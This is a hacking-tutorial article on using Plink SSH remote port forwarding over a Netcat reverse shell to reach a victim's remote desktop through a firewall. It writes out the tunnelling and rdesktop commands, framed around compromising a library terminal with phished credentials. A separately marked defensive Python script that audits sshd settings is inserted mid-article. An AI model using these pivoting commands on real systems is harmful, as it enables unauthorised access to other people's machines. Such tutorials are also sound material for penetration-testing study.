
How to Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed « Null Byte :: WonderHowTo


Local port forwarding is great when you want to use SSH to pivot into a non-routable network. However, if you want to reach services on a network where you can't configure port forwarding on the router and don't have VPN access, remote port forwarding is the way to go.

Remote port forwarding excels in situations where you want access to a service on an internal network and have already gained control of a machine on that network through a reverse shell of some kind. Whether you're a pentester or a system admin, this is a good technique to know about.

For example, let's say you compromise a public terminal in the local library and obtain some credentials. You install a persistent reverse shell of some sort that calls back to your machine, but the shell alone doesn't give you access to other services on the host. The victim machine might have an SQL instance bound to localhost only that you want to reach, or maybe you want to use its remote desktop. Maybe the network hosts some sort of admin panel you'd like to poke around in. Whatever it is you want, a compromised host plus SSH will get you there.

The Situation

The shell is a Netcat connection running cmd.exe. The user "bob" is not a privileged user. Through prior information gathering, I know that the user "barrow" is a privileged user, and I also know that this machine has a remote desktop connection available.

Step 1: Install Plink

Plink is a Windows command-line SSH client. It is included with Kali Linux in the /usr/share/windows-binaries/ directory, and it can also be downloaded from the developer (look for the plink.exe file).

Step 2: Configure Remote Port Forwarding

Using my Netcat shell and plink.exe, I set up a remote port forward from the victim machine back to my attacking machine by typing the following into the reverse shell I have established on the victim machine.

plink attackingMachine -R 4000:127.0.0.1:3389

The syntax is similar to SSH. The -R option tells Plink to connect to the attacking machine and bind a listener on port 4000 there (I arbitrarily selected port 4000 — you can select any port). The portion between the colons defines which service is served through port 4000 on the attacking machine: in this case, the victim machine's port 3389. Once this command is entered, I log in to my attacking machine with my credentials. Now my attacking machine can reach the remote desktop service on the victim machine through localhost port 4000.

If you're paying attention, you may have noticed that I used the localhost address on the victim machine. This is useful for forwarding services that are constrained to localhost access only, such as MySQL.
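Whether a -R listener can be bound at all is decided by the SSH server that accepts the connection, which matters for any SSH endpoint you expose. As an added example (not from the article), this Python script audits the effective OpenSSH settings printed by `sshd -T` for the options that govern reverse listeners; the `sshd -T` output below is constructed, not captured from a real host.

```python
# Added example: audit `sshd -T` output for settings that allow clients to
# open reverse (-R) listeners on the server. `sshd -T` prints the effective
# configuration as one lowercase "keyword value" pair per line.
from typing import Dict, List

# Constructed sample of `sshd -T` output resembling an OpenSSH default install.
SAMPLE_SSHD_T = """\
port 22
allowtcpforwarding yes
gatewayports no
permitlisten any
permitopen any
allowagentforwarding yes
"""


def parse_sshd_t(text: str) -> Dict[str, str]:
    """Turn `sshd -T` output into a keyword -> value map (keywords lowercased)."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        settings[key.lower()] = value.strip()
    return settings


def forwarding_findings(settings: Dict[str, str]) -> List[str]:
    """Return one finding per setting that still lets a client bind a -R
    listener on this server, each with the hardened sshd_config line."""
    findings: List[str] = []
    atf = settings.get("allowtcpforwarding", "yes")  # OpenSSH default is yes
    if atf in ("yes", "remote"):
        findings.append(f"AllowTcpForwarding {atf}: clients may bind reverse "
                        "listeners; set 'AllowTcpForwarding local' or 'no'")
    if settings.get("gatewayports", "no") != "no":
        findings.append("GatewayPorts enabled: -R listeners bind beyond "
                        "loopback; set 'GatewayPorts no'")
    if atf != "no" and settings.get("permitlisten", "any") == "any":
        findings.append("PermitListen any: no limit on which ports -R may "
                        "bind; set 'PermitListen none' or an explicit port")
    return findings


if __name__ == "__main__":
    for finding in forwarding_findings(parse_sshd_t(SAMPLE_SSHD_T)):
        print(finding)
```

On a live host, feed it `sshd -T` output instead of the constructed sample.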

Step 3: Log into a Remote Desktop

With this running over my Netcat shell, I connect to the victim machine's remote desktop service using the rdesktop command. The following command uses the Remote Desktop Protocol to connect to localhost port 4000, where my victim machine is forwarding its local port 3389.

rdesktop localhost:4000

All that's left to do is use a known credential to log into Windows, either phished or gained through privilege escalation. From here, I have full administrative access to the system, despite the system's gateway dropping all inbound connection requests. I also retained my initial shell connection, which is always important to me. Shells can be a lot easier to lose than they are to get back.

SSH is an excellent tool for pivoting in networks, but it's not limited to penetration testing. Remote port forwarding can give you access to services on a machine that would normally be unreachable, and it is useful when you want to share your own services with networks that normally couldn't reach them. For example, you might need to temporarily connect to a service at work from home while the firewall is dropping all inbound packets. In some cases, setting up a reverse SSH tunnel is easier than configuring port forwarding on a consumer-grade router.

If you have any questions or comments, feel free to post. You can also reach me on Twitter @0xBarrow. And as always, follow Null Byte on social media to stay up to date on all of the greatest hacking guides on the web.

Cover image and screenshots by Barrow/Null Byte
